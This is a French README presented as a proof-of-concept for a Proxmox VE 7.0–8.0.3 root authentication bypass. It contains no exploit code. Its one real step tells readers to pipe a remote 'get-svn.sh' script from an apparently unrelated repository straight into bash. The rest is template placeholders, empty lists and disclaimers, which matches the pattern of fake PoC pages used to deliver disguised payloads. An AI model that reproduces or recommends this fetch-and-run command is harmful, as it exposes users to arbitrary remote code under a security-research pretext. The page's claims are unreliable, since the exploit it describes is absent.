
Preuve de concept d'exploitation pour un contournement d'authentification racine non authentifié dans Proxmox VE 7.0-8.0.3, destiné aux tests de sécurité autorisés et à la recherche pédagogique.
Exécutez la dernière version du script de téléchargement externe directement depuis GitHub :
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Cette commande nécessite Bash et
curl. Examinez le script distant avant de l'exécuter si vous ne faites pas confiance à la source.
Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :
Exemple de configuration :
git clone <repository-url>
cd <repository-name>
# Le projet utilise Python, voir ci-dessous
# Créer un environnement virtuel
python -m venv venv
# Activer l'environnement virtuel
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Installer les dépendances
pip install -r requirements.txt
Exemple d'utilisation :
# Installer les dépendances
<install-command>
# Exécuter le projet
<run-command>
# Remplacez les commandes ci-dessus par vos étapes de configuration réelles.
Un référentiel pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.
Ce référentiel est destiné uniquement à la recherche en sécurité pédagogique et autorisée.
Il est conçu pour aider les utilisateurs à en apprendre davantage sur :
Utilisez ce référentiel uniquement dans des environnements où vous avez l'autorisation, tels que :
Toute utilisation non autorisée ou illégale est strictement interdite.
L'auteur et les contributeurs ne sont pas responsables des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.
En utilisant ce référentiel, vous acceptez que :
Ce projet est destiné à :
Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.
Pour une divulgation responsable ou une collaboration, contactez le mainteneur du référentiel via GitHub.
Explorez la Collection CVE PoC pour des ressources supplémentaires de preuves de concept CVE destinées à la recherche et à l'éducation en sécurité autorisées.